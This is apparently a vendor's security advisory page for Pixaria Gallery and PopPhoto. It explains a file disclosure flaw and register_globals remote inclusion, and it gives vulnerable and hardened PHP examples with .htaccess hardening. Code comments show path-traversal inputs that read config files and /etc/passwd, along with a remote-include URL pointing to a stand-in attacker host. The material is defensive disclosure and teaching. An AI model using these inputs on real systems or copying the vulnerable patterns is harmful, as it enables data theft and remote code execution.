Some users (mainly those running Pixaria Gallery on Windows servers) have reported problems with the security patch issued in response to the recently published remote file disclosure exploit. If you applied the patch and large images are no longer displaying, the patched file has been updated to fix the issue and can be downloaded here.
For any issues related to the patch, please email me at info@pixaria.com rather than posting in the forums as I check my e-mails far more regularly than the forum.
This is an important message about a remote file disclosure exploit which has been discovered in Pixaria Gallery versions 2.0.0 and above. Earlier versions may also be affected; an update will be posted here once this has been confirmed or ruled out.
All users of Pixaria 2.0.0 and above are advised to apply the patched file pixaria.image.php immediately to prevent the disclosure of sensitive information from your server to malicious third parties.
Anyone experiencing any issues after applying the patch should contact info@pixaria.com for further assistance.
Further Information
The exploit allows a malicious user to download any file readable by the web server's PHP process from a vulnerable Pixaria website. This includes files containing passwords or configuration information, such as pixaria.config.php or /etc/passwd. That puts the vulnerability in the high risk category, so installation of the patch is recommended without exception.
The patch addresses the vulnerability by validating the file path found in user-submitted data and exiting the script without serving anything when the path is not one the gallery should ever serve.
Further details can be found here: http://www.securityfocus.com/bid/35802
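The following is an added illustration of the class of flaw described above and the shape of the fix, not Pixaria's own pixaria.image.php or its actual patch. The script layout, the IMAGE_ROOT directory and the function names are assumptions for the example.

```php
<?php
// Added example, not Pixaria's code. A hypothetical image-serving script in
// its vulnerable form and a hardened form that validates the requested path.
declare(strict_types=1);

// Assumption for the example: gallery images live in this directory.
const IMAGE_ROOT = __DIR__ . '/images';

// Only these extensions are ever served; anything else is rejected.
const IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * VULNERABLE: the user-supplied value is concatenated and read unchecked.
 * ?file=../../pixaria.config.php or ?file=/../../../etc/passwd discloses any
 * file the PHP process can read. Kept here only to show the flaw.
 */
function serveImageVulnerable(string $requested): void
{
    header('Content-Type: image/jpeg');
    readfile(IMAGE_ROOT . '/' . $requested);
}

/**
 * HARDENED: resolve the path on disk, require it to remain under IMAGE_ROOT
 * (realpath also collapses ../ and follows symlinks, so a symlink pointing
 * outside the root is caught too), and allow only image extensions.
 * Returns the resolved path, or null when the request must be refused.
 */
function resolveImagePath(string $requested, string $root = IMAGE_ROOT): ?string
{
    // NUL bytes can truncate the path in underlying C calls; reject outright.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal  = realpath($root);
    $candidate = realpath($root . '/' . $requested);
    if ($rootReal === false || $candidate === false) {
        return null; // root missing, or requested file does not exist
    }
    // Compare with a trailing separator so "/images-private" cannot pass as "/images".
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // escaped the image directory
    }
    if (!is_file($candidate)) {
        return null;
    }
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, IMAGE_TYPES)) {
        return null; // e.g. a .php file copied under the image root
    }
    return $candidate;
}

function serveImageHardened(string $requested): void
{
    $path = resolveImagePath($requested);
    if ($path === null) {
        // Exit without action, as the patch description puts it.
        http_response_code(403);
        exit;
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    header('Content-Type: ' . IMAGE_TYPES[$ext]);
    readfile($path);
}

serveImageHardened($_GET['file'] ?? '');
```

The essential point is that the check happens on the resolved path, not on the raw string: a blacklist of "../" is easily bypassed with encoding or with symlinks, whereas a prefix test against realpath() output is not.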
Users have reported a security vulnerability in Pixaria which can be exploited if PHP's register_globals setting is turned on.
My current advice is for everyone to upgrade to the newly released version 1.4.3 or, if that's not possible, to install this patched file, class.Smarty.php.zip, into resources/includes on your current installation.
For reference, the Pixaria installation documentation has been updated with instructions on preventing direct web access to Pixaria's include and library scripts. These scripts are only meant to be loaded by other PHP files on the server, never requested by a browser, so blocking them is straightforward: create a text file called .htaccess containing the following:
Order Deny,Allow
Deny from all
This file should then be uploaded to each of the following directories (on Apache 2.4 and later the equivalent directive is Require all denied):
- /resources/incoming/
- /resources/library/
- /resources/includes/
- /resources/pixies/
- /resources/smarty/
To test whether this is working on your site, browse to each of these directories in your web browser, for example:
http://www.mysite.com/pixaria/resources/includes/
You should receive a 403 Forbidden error. If you see a directory listing or the page loads normally, the .htaccess file is not being applied; check that the server's AllowOverride setting for that path permits the Limit directives (Order, Deny, Allow).
PopPhoto Studio has been updated to patch a serious security vulnerability that could allow a malicious attacker to compromise the server: a specially crafted URL could cause PopPhoto to include and execute PHP code from a remote host.
Full details of the vulnerability are described in the Secunia security advisory SA20087, published on 15 May 2006.
The vulnerability only affects servers where the PHP configuration setting register_globals is turned on. PopPhoto does not require this setting, and all users are advised to turn it off where possible in addition to applying the new security patch.
An updated version of PopPhoto (version 3.6.1) can be downloaded from the PopPhoto version history page which also provides details of the bug and a link to the file change log where you can see which file has been updated.
This security vulnerability is specific to PopPhoto Studio and does not affect Pixaria Gallery.
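The two register_globals issues above (the Pixaria one and the PopPhoto remote code inclusion) share one root cause, illustrated here with an added example that is not code from either project. The include helper, the LIB_DIR path and the parameter name "helper" are assumptions for the example; the specifics of the real bugs are in the advisories linked above.

```php
<?php
// Added example, not Pixaria's or PopPhoto's code. Shows how register_globals
// turns an uninitialised variable into a remote file inclusion, and the
// defensive pattern that closes it regardless of the server setting.
declare(strict_types=1);

/**
 * VULNERABLE (only when register_globals = On).
 * $libDir is never assigned in this file; the author assumes a calling script
 * set it. With register_globals on, a request such as
 *   ?libDir=http://attacker.example/
 * makes PHP create $libDir from the query string before any code runs, and
 * with allow_url_include enabled the include fetches and executes the
 * attacker's file. Kept here only to show the flaw.
 */
function loadHelperVulnerable(): void
{
    global $libDir;
    include $libDir . '/helper.php';
}

// Assumption for the example: local helper scripts live here.
const LIB_DIR = __DIR__ . '/resources/library';

/**
 * HARDENED: never rely on a variable you did not assign yourself. Read input
 * explicitly from the superglobals, accept only a bare identifier (no slashes,
 * dots, NUL bytes or URL schemes can pass this pattern) and confirm the
 * resulting file exists under the fixed library directory.
 * Returns the path to include, or null when the request must be refused.
 */
function resolveHelper(string $name): ?string
{
    if (preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name) !== 1) {
        return null;
    }
    $path = LIB_DIR . '/' . $name . '.php';
    return is_file($path) ? $path : null;
}

function loadHelperHardened(string $name): void
{
    $path = resolveHelper($name);
    if ($path === null) {
        http_response_code(400);
        exit;
    }
    require $path;
}

// Defence in depth: refuse to run at all while register_globals is on.
// The setting exists only in PHP < 5.4 (it was removed in 5.4, where ini_get
// returns false). Turn it off globally with "register_globals = Off" in
// php.ini, or per directory under mod_php with
// "php_flag register_globals off" in .htaccess.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('register_globals must be turned off');
}

loadHelperHardened($_GET['helper'] ?? '');
```

Disabling register_globals removes the attack vector, but the hardened function is the real fix: it behaves the same whether the setting is on or off, which is what the advice "PopPhoto does not require this value to be on" relies upon.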